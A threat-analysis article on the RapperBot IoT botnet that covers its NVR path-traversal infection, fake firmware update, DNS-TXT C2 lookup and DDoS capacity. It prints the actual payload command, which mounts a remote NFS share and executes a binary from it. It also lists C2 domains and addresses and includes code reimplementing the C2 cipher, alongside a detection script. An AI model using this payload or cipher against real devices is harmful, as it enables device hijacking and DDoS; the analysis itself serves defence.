RapperBot Hijacking Devices to Launch DDoS Attack In a Split Second


Cybersecurity researchers began detecting an alarming surge in early April 2025 in UDP flood traffic emanating from compromised network video recorders (NVRs) and other edge devices.

Within milliseconds of infection, these devices were weaponized to direct overwhelming volumes of packets at unsuspecting targets, leading to service disruptions and massive bandwidth consumption.

Bitsight analysts identified this activity as the work of a novel botnet they dubbed RapperBot, noting its unusually rapid kill chain and innovative use of legacy hardware constraints to evade detection.


[Figure: 18-port Ethernet Hub Setup (Source – Bitsight)]

The malware’s emergence follows a familiar pattern: threat actors scan the Internet for exposed web interfaces, brute-force or exploit default credentials, and deliver a malicious payload disguised as a firmware update.

Once executed, RapperBot immediately begins two distinct actions: encrypted DNS TXT record queries to obtain command-and-control (C2) IP addresses, and continuous UDP floods on port 80.

Impact assessments show individual device throughput exceeding 1 Gbps, with aggregated botnet capacity peaking at over 7 Tbps during coordinated campaigns against major targets, including cloud-based search providers and social media platforms.

Despite its potency, the malware’s behavior is elegantly simple: it mounts a remote NFS share to fetch and execute architecture-specific binaries, then self-deletes to run entirely in memory.

Bitsight researchers noted that this strategy takes advantage of the minimal BusyBox environment on many IoT devices, where standard download tools such as wget or curl, and even bash's /dev/tcp, are absent.

By exploiting the NVR’s firmware update mechanism—specifically, a path traversal zero-day in the web server followed by a binary fetch over NFS—RapperBot avoids the usual filesystem artifacts that trigger antivirus alerts.

[Figure: Firmware Update JSON Payload (Source – Bitsight)]

Under the hood, RapperBot’s C2 discovery mechanism relies on encrypted TXT records hosted on OpenNIC domains such as iranistrash.libre and pool.rentcheapcars.sbs.

The malware constructs one of 32 predetermined hostnames by selecting randomly from hardcoded subdomain, domain, and TLD lists, then resolves these names against its own hardcoded list of DNS resolvers (1.1.1.1, 8.8.8.8, and others).

The TXT response contains a pipe-separated list of encrypted IP addresses, which the bot decrypts with a custom RC4-like algorithm followed by base-56 decoding.

A Python snippet illustrating the decryption stages appears below:

# Stage 1: Key Scheduling Algorithm (KSA-like)
# first_byte_index / second_byte_index are the key indices taken from the first
# two bytes of the TXT payload; encrypted_payload holds the raw TXT record bytes
S = list(range(56))
key = first_byte_index + second_byte_index * 56
for i in range(55, 0, -1):
    key = (0x41C64E6D * key + 0x3039) & 0xFFFFFFFF  # 32-bit LCG step drives each swap
    j = key % (i + 1)
    S[i], S[j] = S[j], S[i]

# Stage 2: Keystream-based XOR decryption (RC4-style PRGA over a 56-entry S-box)
keystream = bytearray()
i = j = 0
for b in encrypted_payload[2:]:
    i = (i + 1) % 56
    j = (j + S[i]) % 56
    S[i], S[j] = S[j], S[i]
    keystream.append(S[(S[i] + S[j]) % 56] ^ b)

# Stage 3: Base-56 decoding to obtain plaintext IP list
plaintext = base56_decode(keystream)  # base56_decode is the bot's own decoder, not shown here
print(plaintext)  # e.g., b"194.226.121.51|188.92.28.62|..."
[Figure: Getting C2 IP address and connecting to C2 (Source – Bitsight)]
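The decryption stages above carried through end to end, as an added example that is not Bitsight's code: the LCG-seeded permutation, the symmetric XOR keystream (used here in both directions so the roundtrip can be checked), and the split of the pipe-separated IP list. The base-56 step is left out because the article does not give its alphabet, and the way the two leading bytes become key indices is an assumption; the TXT record used is constructed.

```python
from __future__ import annotations
from ipaddress import ip_address

N = 56  # S-box size stated in the article
LCG_MULT, LCG_INC = 0x41C64E6D, 0x3039  # LCG constants from the snippet above

def schedule(first_idx: int, second_idx: int) -> list[int]:
    """KSA-like step: permute 0..55, each swap driven by one 32-bit LCG step."""
    s = list(range(N))
    key = first_idx + second_idx * N
    for i in range(N - 1, 0, -1):
        key = (LCG_MULT * key + LCG_INC) & 0xFFFFFFFF
        j = key % (i + 1)
        s[i], s[j] = s[j], s[i]
    return s

def keystream_xor(s: list[int], data: bytes) -> bytes:
    """PRGA-like step: XOR each byte with S[(S[i] + S[j]) % 56]; symmetric."""
    s = s.copy()
    i = j = 0
    out = bytearray()
    for b in data:
        i = (i + 1) % N
        j = (j + s[i]) % N
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % N] ^ b)
    return bytes(out)

def encrypt_record(first_idx: int, second_idx: int, plaintext: bytes) -> bytes:
    """Constructed record layout: two raw key-index bytes, then the ciphertext."""
    return bytes([first_idx, second_idx]) + keystream_xor(schedule(first_idx, second_idx), plaintext)

def decrypt_record(record: bytes) -> bytes:
    """Assumption: the first two bytes are the key indices (the bot's real mapping is not on the page)."""
    first_idx, second_idx = record[0] % N, record[1] % N
    return keystream_xor(schedule(first_idx, second_idx), record[2:])

def parse_ip_list(plaintext: bytes) -> list[str]:
    """Split the pipe-separated list and keep only well-formed IP addresses."""
    ips = []
    for tok in plaintext.decode(errors="replace").split("|"):
        try:
            ips.append(str(ip_address(tok.strip())))
        except ValueError:  # skip padding, garbage or truncated entries
            continue
    return ips
```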

Infection Mechanism

RapperBot’s infection vector capitalizes on the administrative port (TCP 34567) of vulnerable NVRs.

Upon identifying an exposed device, the attacker exploits a path traversal flaw to download account configuration files, revealing both hashed and plaintext credentials.

With these credentials, the attacker initiates a fake firmware update, sending a ZIP-formatted payload over the proprietary update protocol.

The ZIP archive contains a simple InstallDesc JSON instructing the device to mount 104.194.9.127:/nfs and execute the payload script:

{
  "UpgradeCommand": [
    {
      "Command": "Shell",
      "Script": "cd /var;mount -o intr,nolock,exec 104.194.9.127:/nfs z;z/z;"
    }
  ]
}

This approach cleverly bypasses the NVR’s BusyBox limitations—no wget, curl, or /dev/tcp—by using NFS, a protocol universally supported even on minimal embedded Linux systems.

The script iterates through multiple ARM architecture binaries until successful, writes a marker file .r, then cleans up, leaving no on-disk executable.

Executing immediately from the mounted share, with nothing written to local storage, significantly reduces the forensic footprint and enables the split-second transition from benign device to active DDoS participant.
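A defender-side check for the update path described above, as an added example that is not Bitsight's or the vendor's code: it opens an upgrade ZIP in memory, reads the InstallDesc JSON and flags Shell commands that mount a remote NFS export and then run something from it. The InstallDesc member name and the ZIP layout are assumptions; the sample package is constructed from the JSON shown above.

```python
from __future__ import annotations
import io
import json
import re
import zipfile

# The article's payload mounts a remote NFS export inside /var and runs a file from it.
NFS_MOUNT = re.compile(r"\bmount\b[^;&|]*\b(\d{1,3}(?:\.\d{1,3}){3}):(/\S*)")
EXEC_AFTER_MOUNT = re.compile(r";\s*\S+/\S+\s*;?\s*$")  # heuristic: trailing "dir/file" run

def inspect_install_desc(doc: str) -> list[dict]:
    """One finding per Shell UpgradeCommand that mounts a remote NFS share."""
    findings = []
    for cmd in json.loads(doc).get("UpgradeCommand", []):
        if cmd.get("Command") != "Shell":
            continue
        script = cmd.get("Script", "")
        m = NFS_MOUNT.search(script)
        if m:
            findings.append({
                "nfs_server": m.group(1),
                "export": m.group(2),
                "executes_from_mount": bool(EXEC_AFTER_MOUNT.search(script)),
                "script": script,
            })
    return findings

def inspect_upgrade_zip(blob: bytes) -> list[dict]:
    """Open an upgrade ZIP in memory and inspect its InstallDesc member, if any."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        names = [n for n in zf.namelist() if n.rsplit("/", 1)[-1] == "InstallDesc"]
        return inspect_install_desc(zf.read(names[0]).decode()) if names else []

# Constructed sample mirroring the InstallDesc shown in the article
SAMPLE_DESC = json.dumps({"UpgradeCommand": [{"Command": "Shell",
    "Script": "cd /var;mount -o intr,nolock,exec 104.194.9.127:/nfs z;z/z;"}]})

def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("InstallDesc", SAMPLE_DESC)
    return buf.getvalue()

if __name__ == "__main__":
    for f in inspect_upgrade_zip(build_sample_zip()):
        print(f"NFS mount from {f['nfs_server']}{f['export']} executes={f['executes_from_mount']}")
```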


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.